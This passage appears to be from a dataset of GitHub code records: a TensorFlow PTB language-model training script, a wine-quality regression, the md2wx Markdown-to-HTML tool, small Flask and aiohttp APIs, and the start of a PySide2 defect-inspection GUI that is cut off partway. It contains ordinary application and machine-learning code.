num_layers = 2\n num_steps = 20\n hidden_size = 200\n max_epoch = 4\n max_max_epoch = 13\n keep_prob = 1.0\n lr_decay = 0.5\n batch_size = 20\n vocab_size = 10000\n\n\nclass MediumConfig(object):\n \"\"\"Medium config.\"\"\"\n init_scale = 0.05\n learning_rate = 1.0\n max_grad_norm = 5\n num_layers = 2\n num_steps = 35\n hidden_size = 650\n max_epoch = 6\n max_max_epoch = 39\n keep_prob = 0.5\n lr_decay = 0.8\n batch_size = 20\n vocab_size = 10000\n\n\nclass LargeConfig(object):\n \"\"\"Large config.\"\"\"\n #init_scale = 0.04\n init_scale = 0.004\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 2\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\nclass XLargeConfig(object):\n \"\"\"Large config.\"\"\"\n init_scale = 0.04\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 3\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\nclass XXLargeConfig(object):\n 
\"\"\"Large config.\"\"\"\n init_scale = 0.04\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 4\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\ndef run_epoch(session, model, data, eval_op=None, verbose=False, epoch_ind=0):\n \"\"\"Runs the model on the given data.\"\"\"\n start_time = time.time()\n epoch_size = ((len(data) // model.batch_size) - 1) // model.num_steps\n costs = 0.0\n iters = 0\n if eval_op is not None:\n fetches = [model.cost, model.output_h, model.output_c, eval_op]\n else:\n fetches = [model.cost, model.output_h, model.output_c]\n\n h = np.zeros(shape=(model.num_layers, model.batch_size, model.size), dtype=np.float32)\n c = np.zeros(shape=(model.num_layers, model.batch_size, model.size), dtype=np.float32)\n\n for step, (x, y) in enumerate(reader.ptb_iterator(data, model.batch_size, model.num_steps)):\n\n feed_dict = {}\n feed_dict[model.input_data] = x\n feed_dict[model.targets] = y\n feed_dict[model.input_c] = c\n feed_dict[model.input_h] = h\n\n if eval_op is not None:\n cost, h, c, _ = session.run(fetches, feed_dict)\n else:\n cost, h, c = session.run(fetches, feed_dict)\n\n costs += cost\n iters += model.num_steps\n\n if verbose and step % (epoch_size // 10) == 10:\n print(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / iters),\n iters * model.batch_size / (time.time() - start_time)))\n\n print(\"TOTAL EPOCH TIME: %.3f seconds\" % (time.time() - start_time))\n return np.exp(costs / iters)\n\n\ndef get_config():\n if FLAGS.model == \"small\":\n return SmallConfig()\n elif FLAGS.model == \"medium\":\n return MediumConfig()\n elif FLAGS.model == \"large\":\n return LargeConfig()\n elif FLAGS.model == \"xlarge\":\n return XLargeConfig()\n elif FLAGS.model == \"xxlarge\":\n return XXLargeConfig()\n else:\n raise ValueError(\"Invalid model: %s\", FLAGS.model)\n\n\ndef main(_):\n if not FLAGS.data_path:\n raise ValueError(\"Must set --data_path to PTB data directory\")\n\n raw_data = reader.ptb_raw_data(FLAGS.data_path)\n train_data, valid_data, test_data, _ = raw_data\n\n config = get_config()\n eval_config = get_config()\n eval_config.batch_size = 1\n eval_config.num_steps = 1\n\n with tf.Graph().as_default():\n tf.set_random_seed(FLAGS.gseed)\n if FLAGS.init_scale != 0.0:\n initializer = tf.random_uniform_initializer(-1*FLAGS.init_scale,\n FLAGS.init_scale)\n else:\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=None, initializer=initializer):\n m = PTBModel(is_training=True, config=config, debug=FLAGS.debug)\n tf.summary.scalar(\"Learning Rate\", m.lr)\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n mvalid = PTBModel(is_training=False, config=config)\n\n #with tf.name_scope(\"Test\"):\n # with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n # mtest = PTBModel(is_training=False, config=eval_config)\n\n per_epoch_train_loss_update = tf.placeholder(tf.float32, shape=[])\n per_epoch_train_loss = tf.Variable(float(\"inf\"), dtype=tf.float32, trainable=False, name='Epoch_train_loss', validate_shape=False)\n tf.summary.scalar(\"Training Perplexity\", per_epoch_train_loss)\n per_epoch_train_loss_update_op = tf.assign(per_epoch_train_loss, per_epoch_train_loss_update)\n\n per_epoch_valid_loss_update = 
tf.placeholder(tf.float32, shape=[])\n per_epoch_valid_loss = tf.Variable(float(\"inf\"), dtype=tf.float32, trainable=False, name='Epoch_train_loss', validate_shape=False)\n tf.summary.scalar(\"Validation Perplexity\", per_epoch_valid_loss)\n per_epoch_valid_loss_update_op = tf.assign(per_epoch_valid_loss, per_epoch_valid_loss_update)\n #\n\n summary = tf.summary.merge_all()\n\n prev_validation_error = float(\"inf\")\n validation_err_went_up_counter = 0\n saver = tf.train.Saver()\n #summary_writer = tf.train.SummaryWriter(logdir=FLAGS.save_path, graph=tf.get_default_graph())\n sv = tf.train.Supervisor(logdir=FLAGS.save_path, is_chief=True,\n save_model_secs=0, saver=saver, save_summaries_secs=0) #\n if FLAGS.initial_lr != 0.0: # we'll do 0 epoch\n erange = [-1] + range(config.max_max_epoch)\n else:\n erange = range(config.max_max_epoch)\n path_to_latest_checkpoint = \"\"\n\n with sv.managed_session() as session:\n for i in erange:\n if i != -1:\n lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n m.assign_lr(session, config.learning_rate * lr_decay)\n else: #very first epoch\n m.assign_lr(session, FLAGS.initial_lr)\n\n print(\"Epoch: %d Learning rate: %.8f\" % (i + 1, session.run(m.lr)))\n train_perplexity = run_epoch(session, m, train_data, eval_op=m.train_op, verbose=True, epoch_ind=i)\n\n print(\"Epoch: %d Train Perplexity: %.3f\" % (i + 1, train_perplexity))\n valid_perplexity = run_epoch(session, mvalid, valid_data)\n print(\"Epoch: %d Valid Perplexity: %.3f\" % (i + 1, valid_perplexity))\n\n if valid_perplexity < prev_validation_error:\n prev_validation_error = valid_perplexity\n validation_err_went_up_counter = 0\n path_to_latest_checkpoint = sv.saver.save(sess=session, save_path=FLAGS.save_path+\"/model\",\n global_step=i)\n print(\"Saved currently best model to: %s\" % path_to_latest_checkpoint)\n else:\n validation_err_went_up_counter += 1\n if validation_err_went_up_counter > FLAGS.max_valid_increases:\n print(\"EARLY STOPPING!!! 
Restoring from %s\" % (path_to_latest_checkpoint))\n sv.saver.restore(session, path_to_latest_checkpoint)\n\n session.run(per_epoch_valid_loss_update_op, feed_dict={per_epoch_valid_loss_update: valid_perplexity})\n session.run(per_epoch_train_loss_update_op, feed_dict={per_epoch_train_loss_update: train_perplexity})\n #sv.summary_writer.add_summary(session.run(summary), i)\n\n #test_perplexity = run_epoch(session, mtest, test_data)\n #print(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n tf.app.run()\n ","repo_name":"okuchaiev/LM-PTB-CUDNNLSTM","sub_path":"ptb_word_lm.py","file_name":"ptb_word_lm.py","file_ext":"py","file_size_in_byte":18459,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"17091322663","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\n\r\n# Load the wine quality dataset (replace 'wine_quality.csv' with your dataset file)\r\nwine_data = pd.read_csv('wine_quality.csv')\r\n\r\n# Prepare the data: Assume 'quality' is the target variable, and other columns are features\r\nX = wine_data.drop('quality', axis=1) # Features\r\ny = wine_data['quality'] # Target\r\n\r\n# Split the data into training and testing sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Create a linear regression model\r\nmodel = LinearRegression()\r\n\r\n# Train the model on the training data\r\nmodel.fit(X_train, y_train)\r\n\r\n# Make predictions on the test data\r\ny_pred = model.predict(X_test)\r\n\r\n# Calculate model performance metrics\r\nmse = mean_squared_error(y_test, y_pred)\r\nr2 = r2_score(y_test, y_pred)\r\n\r\n# Print model performance metrics\r\nprint(f\"Mean Squared Error (MSE): {mse}\")\r\nprint(f\"R-squared (R2) Score: {r2}\")\r\n\r\n# Optional: Visualize the predicted vs. 
actual wine quality\r\nplt.scatter(y_test, y_pred)\r\nplt.xlabel('Actual Wine Quality')\r\nplt.ylabel('Predicted Wine Quality')\r\nplt.title('Wine Quality Prediction')\r\nplt.show()\r\n","repo_name":"sumitdwivedi0640/Bharat-Intern","sub_path":"Wine_Quality_Prediction.py","file_name":"Wine_Quality_Prediction.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"72679043391","text":"\"\"\"Convert Markdown into HTML that can be published with one click\n\"\"\"\n\nimport os\nimport io\nimport sys\nimport shlex\nimport time\nimport argparse\nimport tempfile\nimport shutil\nimport webbrowser\nimport threading\nfrom typing import Optional, Union\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom string import Template\nfrom functools import partial\nfrom argparse import ArgumentParser\n\nimport markdown\nimport frontmatter\n\nfrom md2wx.styles import code_styles\n\npkg_path = Path(__file__).parent\n\nSTATIC_DIR = pkg_path / 'static'\n\nSTYLE_DIR = STATIC_DIR / 'css'\n\nBUILTIN_STYLES = {css.stem: css for css in STYLE_DIR.glob('*.css')}\nBUILTIN_STYLES.pop('_basic')\nBASIC_STYLE_FILE = STYLE_DIR / '_basic.css'\nDEFAULT_STYLE_NAME = 'cyan'\n\nassert DEFAULT_STYLE_NAME in BUILTIN_STYLES\n\nTEMPLATE_PATH = pkg_path / 'templates' / 'wx.html'\n\nMAIN_SCRIPT_FILE = STATIC_DIR / 'js' / 'script.js'\n\nCODE_STYLE = 'github-dark'\n\nSERVER_PORT = 8800\n\nDEBUG = False\n\nassert STATIC_DIR.is_dir()\nassert TEMPLATE_PATH.is_file()\n\n# arguments passed in via an environment variable\nEV_ARGS = 'MD2WX_ARGS'\n\n\ndef validate_static_file(static_file: Optional[Union[str, Path]]):\n    \"\"\"Validate the static file argument\n\n    Three cases are allowed:\n\n    - None: return it directly and handle it as the default\n    - Path: must be an existing file\n    - str: must be a link starting with http:// or https://, otherwise treat it as a path\n\n    \"\"\"\n    if static_file is None:\n        return static_file\n    if isinstance(static_file, str):\n        if static_file.startswith('http://') or static_file.startswith('https://'):\n            return static_file\n        static_file = Path(static_file)\n    assert static_file.is_file(), f'指定的静态文件不存在:{static_file}'\n    return static_file\n\n\ndef get_style(style_file: Optional[Union[str, Path]], default='') -> str:\n    if style_file is None:\n        return default\n    elif isinstance(style_file, str):\n        return style_file\n    elif isinstance(style_file, Path):\n        name = style_file.name\n        return f'<link rel=\"stylesheet\" href=\"{name}\">'\n    else:\n        raise ValueError(f'样式文件参数不正确:{style_file}')\n\n\ndef get_custom_script(script_file: Optional[Union[str, Path]], default='') -> str:\n    if script_file is None:\n        return default\n    elif isinstance(script_file, str):\n        return script_file\n    elif isinstance(script_file, Path):\n        name = script_file.name\n        return f'<script src=\"{name}\"></script>'\n    else:\n        raise ValueError(f'脚本文件参数不正确:{script_file}')\n\n\ndef markdown_to_html(markdown_text):\n    return markdown.markdown(markdown_text,\n                             extensions=['extra', 'toc', 'nl2br', 'sane_lists'])\n\n\ndef render_markdown(markdown_path: Path, template: Template, **kwargs):\n    with open(markdown_path, 'r', encoding='utf-8') as f:\n        post = frontmatter.load(f)\n    metadata = post.metadata\n    content = markdown_to_html(post.content)\n    kwargs.update(metadata)\n    if DEBUG:\n        print(f'模板参数传入: {kwargs}')\n    return template.substitute(content=content, **kwargs)\n\n\ndef run_server(directory='.', port=SERVER_PORT):\n    from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler\n\n    Handler = partial(SimpleHTTPRequestHandler, directory=directory)  # noqa\n\n    with ThreadingHTTPServer((\"\", port), Handler) as httpd:\n        print(\"serving at port\", port)\n        print(\"按下 Ctrl + c 停止运行\")\n        try:\n            httpd.serve_forever()\n        except 
KeyboardInterrupt:\n            httpd.shutdown()\n\n\ndef iter_md_files(content_path: Path):\n    if content_path.is_file():\n        yield content_path\n    elif content_path.is_dir():\n        for p in content_path.glob('*.md'):\n            if p.is_file():\n                yield p\n    else:\n        raise ValueError()\n\n\n@contextmanager\ndef ctx_output_dir(output_dir: Optional[Path]):\n    tmp_dir = None\n    if not output_dir:\n        tmp_dir = tempfile.TemporaryDirectory()\n        output_dir = Path(tmp_dir.name)\n    if not output_dir.exists():\n        output_dir.mkdir(parents=True)\n    try:\n        yield output_dir\n    finally:\n        if tmp_dir:\n            tmp_dir.cleanup()\n\n\ndef app(content_path: Path,\n        template_path: Path,\n        output_dir: Optional[Path] = None,\n        style_path: Optional[Union[str, Path]] = None,\n        custom_script_path: Optional[Union[str, Path]] = None,\n        code_style: str = CODE_STYLE,\n        copy_basic_static=True,\n        start_server=False,\n        server_port=SERVER_PORT,\n        quite=False\n        ):\n    tmpl = Template(template_path.read_text(encoding='utf-8'))\n    tmpl_ts = template_path.stat().st_mtime\n\n    # the command-line arguments were already validated, but validate again here in case app() is called directly\n    style_path = validate_static_file(style_path)\n    custom_script_path = validate_static_file(custom_script_path)\n    to_copy = [f for f in (custom_script_path, style_path) if isinstance(f, Path)]\n    if copy_basic_static:\n        to_copy.append(MAIN_SCRIPT_FILE)\n        to_copy.append(BASIC_STYLE_FILE)\n\n    with ctx_output_dir(output_dir) as output_dir:\n        print(f'输出文件路径:{output_dir}')\n        for f in to_copy:\n            if f.parent != output_dir:\n                shutil.copy(f, output_dir)\n\n        custom_style = get_style(style_path, default='')\n        custom_script = get_custom_script(custom_script_path, default='')\n\n        def render(all_render=False):\n            nonlocal tmpl, tmpl_ts\n\n            need_all_render = all_render\n            # TODO: not only the template, the other static files should also be checked for updates\n            if template_path.stat().st_mtime > tmpl_ts:\n                # reload template\n                need_all_render = True\n                tmpl = Template(template_path.read_text(encoding='utf-8'))\n                tmpl_ts = template_path.stat().st_mtime\n\n            for md_file in iter_md_files(content_path):\n                html_file = output_dir.joinpath(f'{md_file.stem}.html')\n                if not need_all_render and html_file.is_file() \\\n                        and html_file.stat().st_mtime > md_file.stat().st_mtime:\n                    continue\n                html_text = render_markdown(md_file, template=tmpl,\n                                            custom_style=custom_style,\n                                            custom_script=custom_script,\n                                            code_style=code_style)\n                html_file.write_text(html_text, encoding='utf-8')\n\n        def monitor():\n            while True:\n                time.sleep(2)\n                render()\n\n        def openurl():\n            time.sleep(1)\n            url = f'http://localhost:{server_port}/'\n            if content_path.is_file():\n                url += content_path.stem + '.html'\n            if server_started_ok:\n                webbrowser.open(url)\n\n        render(all_render=True)\n\n        if start_server:\n            threading.Thread(target=monitor, daemon=True).start()\n            if not quite:\n                threading.Thread(target=openurl).start()\n            try:\n                server_started_ok = True\n                run_server(directory=str(output_dir), port=server_port)\n            except OSError:\n                print(f'启动 HTTP Server 失败,使用 --port 换其它端口试试。')\n                server_started_ok = False\n                raise\n\n\n\ndef _main(args):\n    content_path = Path(args.mdpath)\n    if not (content_path.is_dir() or content_path.is_file()):\n        raise ValueError(f'Markdown路径不正确,请指定文件夹或文件:{content_path}')\n\n    start_server = args.start_server\n    if args.output:\n        output_dir = Path(args.output)\n        if output_dir.exists() and not output_dir.is_dir():\n            raise ValueError(f'Output已存在且不是一个文件夹:{output_dir}')\n    else:\n        output_dir = None\n        if not start_server:\n            raise ValueError(\n                f'没有指定输出目录,页面会输出到临时目录,此时如果不启动服务器,命令执行完毕后文件会自动清除而无法查看,所以至少需满足一项。')\n\n    if args.template:\n        template_path = Path(args.template)\n    else:\n        
template_path = TEMPLATE_PATH\n        if not args.copy_basic_static:\n            raise ValueError(\n                f'默认的模板需要JS才能正常运行,该选项只在指定了自定义模板的情况下才能使用。')\n\n    assert template_path.is_file(), f'模板文件不正确: {template_path}'\n\n    if args.css:\n        style_file = validate_static_file(args.css)\n    else:\n        style_file = BUILTIN_STYLES.get(args.style, None)\n\n    if args.script:\n        script_file = validate_static_file(args.script)\n    else:\n        script_file = None\n\n    code_stype = args.codestyle\n    if code_stype not in code_styles:\n        raise ValueError(f'codestyle 不支持,可选择的是:{code_styles}')\n\n    if args.dryrun:\n        exit(0)\n\n    app(content_path, template_path,\n        output_dir=output_dir,\n        style_path=style_file,\n        custom_script_path=script_file,\n        copy_basic_static=args.copy_basic_static,\n        start_server=start_server, server_port=args.port,\n        code_style=code_stype, quite=args.quite\n        )\n\n\ndef main():\n    parser = ArgumentParser(prog='md2wx', description='Markdown 一键复制发布到微信公众号(或其它平台)。', epilog='')\n    parser.add_argument('mdpath', help='.md 文件或者是其所在文件夹路径,缺省是当前路径')\n    parser.add_argument('--output', '-o', help='输出文件夹路径,缺省是临时目录')\n    parser.add_argument('--template', help='模板文件路径')\n\n    parser.add_argument('--script', help='JavaScript 文件路径')\n\n    style_group = parser.add_mutually_exclusive_group()\n    style_group.add_argument('--style', choices=list(BUILTIN_STYLES.keys()), default=DEFAULT_STYLE_NAME,\n                             help='内置的样式名')\n    style_group.add_argument('--css', help='自定义样式的CSS文件')\n    parser.add_argument('--codestyle', default=CODE_STYLE, help=f'代码样式名,缺省是 \"{CODE_STYLE}\"')\n    parser.add_argument('--no-basic-static', dest='copy_basic_static', action='store_false',\n                        help='不要复制基础静态文件(_basic.css 和 script.js),当自定义模板不需要这些文件时使用该选项')\n    parser.add_argument('--noserver', '--noserve', dest='start_server', action='store_false',\n                        help='不启动HTTP服务器(只有在使用 --output 指定了输出目录时才能用)')\n    parser.add_argument('--port', type=int, default=SERVER_PORT, help='HTTP服务器端口,缺省是 ' + str(SERVER_PORT))\n    parser.add_argument('--quite', '-q', action='store_true', help='安静模式,不要打开浏览器')\n    parser.add_argument('--debug', action='store_true', help='开启Debug')\n    parser.add_argument('--dryrun', action='store_true',\n                        help='不实际运行,解析参数后立即退出,配合 --debug 查看参数解析结果')\n\n    global DEBUG\n    args_ns = argparse.Namespace()\n    if EV_ARGS in os.environ:\n        env_args = shlex.split(os.environ.get(EV_ARGS))\n        _sys_stderr = sys.stderr\n        try:\n            sys.stderr = io.StringIO()\n            parser.parse_known_args(env_args, args_ns)\n        except SystemExit:\n            pass\n        finally:\n            sys.stderr = _sys_stderr\n\n    args = parser.parse_args(namespace=args_ns)\n    assert args is args_ns\n\n    DEBUG = args.debug\n    if DEBUG:\n        print(args)\n\n    try:\n        _main(args)\n    except Exception as err:\n        print(f'Error: {err}')\n        if DEBUG:\n            raise\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"davycloud/md2wx","sub_path":"md2wx/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
{"seq_id":"9719939878","text":"\"\"\"\napi.py \n- provides the API endpoints for consuming and producing\n  REST requests and responses\n\"\"\"\n\nfrom flask import Blueprint, jsonify, request \nfrom model.models import db, Survey, Question, Choice \n\n\napi = Blueprint('api', __name__)\n\n@api.route('/hello/<name>/')\ndef say_hello(name): \n    response = { 'msg': \"Hello33 {}\".format(name) }\n    return jsonify(response)\n\n@api.route('/surveys/<id>/', methods=('GET', 'PUT'))\ndef survey(id): \n    if request.method == 'GET':\n        survey = Survey.query.get(id)\n        return jsonify({ 'survey': survey.to_dict() })\n    elif 
request.method == 'PUT':\n        data = request.get_json()\n        for q in data['questions']:\n            choice = Choice.query.get(q['choice'])\n            choice.selected = choice.selected + 1\n        db.session.commit()\n        survey = Survey.query.get(data['id'])\n        return jsonify(survey.to_dict()), 201\n","repo_name":"danieljjh/flask-test","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"75195567229","text":"from myning import database\nfrom myning.handlers.users_seasons import user_season\nfrom myning.utils.auth import authed\n\nfrom aiohttp import web\nfrom myning.utils.errors import wrap_errors\n\nfrom myning.utils.transforming import jsonable\n\n\n@authed\n@user_season\nasync def get_stats(*_, user_season_id: int = None, **__):\n    stats = await database.stats.get_stats(user_season_id)\n    stats = {stat[\"key\"]: stat[\"value\"] for stat in stats}\n    if not stats:\n        return web.Response(status=204)\n\n    return web.json_response(data=stats, status=200)\n\n\n@authed\n@user_season\nasync def sync_stats(request: web.Request, user_season_id: int = None, *_, **__):\n    content: dict = await request.json()\n\n    data = {}\n    for key, value in content.items():\n        stat = await database.stats.upsert_stat(\n            user_season_id=user_season_id, key=key, value=value\n        )\n        if not stat:\n            return web.Response(status=500)\n        data[stat[\"key\"]] = stat[\"value\"]\n\n    return web.json_response(data, status=200)\n\n\n@authed\n@user_season\nasync def update_stat(request: web.Request, user_season_id: int = None, *_, **__):\n    content: dict = await request.json()\n\n    errors = []\n    expected_keys = [\"key\", \"value\"]\n    for key in expected_keys:\n        if not key in content.keys():\n            errors.append(f\"'{key}' must not be empty\")\n\n    if errors:\n        return wrap_errors(errors)\n\n    stat = await database.stats.upsert_stat(\n        user_season_id=user_season_id, key=content[\"key\"], value=content[\"value\"]\n    )\n\n    return web.json_response(jsonable(stat), status=200)\n\n\n@authed\n@user_season\nasync def increment_stat(request: web.Request, user_season_id: int = None, *_, **__):\n    key = request.match_info[\"key\"]\n\n    stat = await database.stats.get_stat(user_season_id=user_season_id, key=key)\n    if not stat:\n        return web.Response(status=404)\n\n    value = stat[\"value\"] + 1\n\n    stat = await database.stats.upsert_stat(\n        user_season_id=user_season_id, key=key, value=value\n    )\n\n    return web.json_response(jsonable(stat), status=200)\n","repo_name":"TheRedPanda17/myning-api","sub_path":"myning/handlers/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"21590081356","text":"\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent, QMediaPlaylist\n\n\nfrom qt_style import TitleLabel, TitleCombox\nimport sys, datetime\nfrom mj_detector_ob import BoardDefectDetect,PRODUCT_FLAG\nfrom database import SQLDatabase\nimport os\nSOUND_LIST = [\"no_s.mp3\", \"no_f.mp3\", \"s.mp3\", \"board.mp3\"]\ndef change_date_format(str_time):\n\tif len(str(str_time))==2 :\n\t\treturn str(str_time)\n\telse :\n\t\treturn '0'+str(str_time)\n\ndef get_datetime():\n    now = datetime.datetime.now()\n    return f"{now.year}-{change_date_format(now.month)}-{change_date_format(now.day)} 
{change_date_format(now.hour)}:{change_date_format(now.minute)}:{change_date_format(now.second)}\"\n\ndef get_date():\n    now = datetime.datetime.now()\n    return f\"{now.year}-{change_date_format(now.month)}-{change_date_format(now.day)}\"\ndef change_number(num):\n    if len(str(num))>3:\n        return str(num)[:-3]+\",\"+str(num)[-3:]\n    return str(num)\n\ndef change_text(str_num):\n    return int(str_num.replace(\",\", \"\"))\nclass Main(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setFixedSize(1920, 1020)\n        self.stackedWidget = QStackedWidget()\n        defect_img_widget = QWidget(self)\n        defect_img_widget.setContentsMargins(0,0,0,0)\n        defect_img_layout = QHBoxLayout(self)\n\n        # [jk] add\n        camera_img_widget = QWidget(self)\n        camera_img_widget.setContentsMargins(0,0,0,0)\n        camera_img_layout = QHBoxLayout(self)\n        # [jk] add\n\n\n\n        main_widget = QWidget(self)\n        main_layout = QHBoxLayout(self)\n        left_layout = QVBoxLayout()\n        center_layout = QVBoxLayout()\n        right_layout = QVBoxLayout()\n\n\n        self.inspection_date = TitleLabel(\"검사 일자\")\n        self.inspection_date.change_label(get_date())\n\n        \n        self.inspector_name = TitleCombox(\"검사 담당자\", 0, \"name\")\n\n\n        self.workorder_quantity = TitleLabel(\"작지 수량\")\n        self.workorder_quantity.change_label(\"100\")\n\n        self.inspection_quantity = TitleLabel(\"검사 수량\")\n        self.inspection_quantity.change_label(\"0\")\n\n        self.inspection_percent = TitleLabel(\"검사 진행율\")\n        self.inspection_percent.change_label(\"0%\")\n\n        self.bad_quantity = TitleLabel(\"불량 수량\")\n        self.bad_quantity.change_label(\"0\")\n\n        self.bad_type = TitleLabel(\"불량 유형\")\n        self.bad_type.change_label(\"\")\n\n        self.normal_quantity = TitleLabel(\"양품 수량\")\n        self.normal_quantity.change_label(\"0\")\n\n\n        # test_date_combo = QComboBox(self)\n        # test_date_combo.addItems([\"\"])\n\n        # button = QPushButton(\"\")\n        left_layout.addWidget(self.inspection_date)\n        left_layout.addWidget(self.inspector_name)\n        left_layout.addWidget(self.workorder_quantity)\n        left_layout.addWidget(self.inspection_quantity)\n        left_layout.addWidget(self.inspection_percent)\n        left_layout.addWidget(self.bad_quantity)\n        left_layout.addWidget(self.bad_type)\n        left_layout.addWidget(self.normal_quantity)\n        \n        self.workorder_item = TitleCombox(\"작지 품명\", 2, \"item_name\", self.workorder_quantity, 1, 2 )\n        self.workorder = TitleCombox(\"작지 번호\", 1, \"number\",self.workorder_item, 1, 2) # the workorder item name must change according to the workorder number\n        self.workorder_item.setContentsMargins(0,0,0,0)\n        bad_img_label = QLabel()\n        bad_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n        bad_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n        center_layout.setContentsMargins(0,25,0,25)\n        center_layout.addWidget(bad_img_label)\n\n        self.inspection_start_btn = QPushButton(\"검사 시작\")\n        self.inspection_start_btn.clicked.connect(self.on_inspection_start)\n\n        self.inspection_start_time = QLabel()\n        \n        \n        self.inspection_stop_btn = QPushButton(\"검사 종료\")\n        self.inspection_stop_btn.clicked.connect(self.on_inspection_stop)\n\n        self.inspection_stop_time = QLabel()\n\n        # [jk] add\n        self.camera_view_button = QPushButton(\"camera view\")\n        self.camera_view_button.clicked.connect(self.on_camera_view)\n        # [jk] add\n\n        right_layout.addWidget(self.workorder)\n        right_layout.addWidget(self.workorder_item)\n        right_layout.addStretch()\n        right_layout.addWidget(self.camera_view_button)\n        right_layout.addWidget(self.inspection_start_btn)\n        right_layout.addWidget(self.inspection_start_time)\n        right_layout.addWidget(self.inspection_stop_btn)\n        
right_layout.addWidget(self.inspection_stop_time)\n right_layout.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n \n\n main_layout.addLayout(left_layout, 2)\n main_layout.addLayout(center_layout, 6)\n main_layout.addLayout(right_layout,3)\n\n # [jk] add\n self.camera_view_button.setFixedHeight(70)\n self.camera_view_button.setContentsMargins(0,0,0,0)\n self.camera_view_button.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #0d5e2d\")\n # [jk] add\n\n\n self.inspection_start_btn.setFixedHeight(150)\n self.inspection_start_btn.setContentsMargins(0,0,0,0)\n self.inspection_start_btn.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #0d5e2d\")\n self.inspection_start_time.setAlignment(Qt.AlignCenter)\n\n self.inspection_start_time.setFixedHeight(68)\n\n self.inspection_start_time.setStyleSheet(\"border: 1px solid #374781; color: #000000; font-size: 28px;\")\n self.inspection_stop_btn.setFixedHeight(150)\n self.inspection_stop_btn.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #9e4f00\")\n self.inspection_stop_btn.setEnabled(True)\n self.inspection_stop_time.setAlignment(Qt.AlignCenter)\n\n self.inspection_stop_time.setFixedHeight(68)\n\n self.inspection_stop_time.setStyleSheet(\"border: 1px solid #374781; color: #000000; font-size: 28px;\")\n \n right_layout.setContentsMargins(0,15, 0, 25)\n self.setStyleSheet(\"background: #ffffff\")\n main_widget.setLayout(main_layout)\n main_layout.setContentsMargins(0,0,0,0)\n # [jk] add\n camera_temp_label = QLabel()\n # [jk] add\n\n temp_label = QLabel()\n self.defect_img_label = QLabel()\n self.defect_img_label.setContentsMargins(0,0,0,0)\n self.defect_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n self.defect_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n defect_show_button_hbox = QHBoxLayout()\n self.defect_show_list = []\n\n # [jk] add\n self.camera_img_label = QLabel()\n self.camera_img_label.setContentsMargins(0,0,0,0)\n self.camera_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n self.camera_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n camera_show_button_hbox = QHBoxLayout()\n # [jk] add\n\n\n\n defect_show_button = QPushButton(\"확인\")\n defect_show_button.setStyleSheet(\"color: #ffffff; font-size: 32px; background: #0d5e2d\")\n defect_show_button.setFixedSize(160,100)\n defect_show_button.clicked.connect(self.on_defect_show)\n defect_show_button_hbox.addStretch(1)\n defect_show_button_hbox.addWidget(defect_show_button)\n\n # [jk] add\n camera_show_button = QPushButton(\"back\")\n camera_show_button.setStyleSheet(\"color: #ffffff; font-size: 32px; background: #0d5e2d\")\n camera_show_button.setFixedSize(160,100)\n camera_show_button.clicked.connect(self.on_camera_button)\n camera_show_button_hbox.addStretch(1)\n camera_show_button_hbox.addWidget(camera_show_button)\n # [jk] add\n\n \n defect_img_layout.setContentsMargins(0,0,0,0)\n defect_img_layout.addWidget(temp_label, 2)\n defect_img_layout.addWidget(self.defect_img_label, 9)\n defect_img_layout.addLayout(defect_show_button_hbox, 1)\n 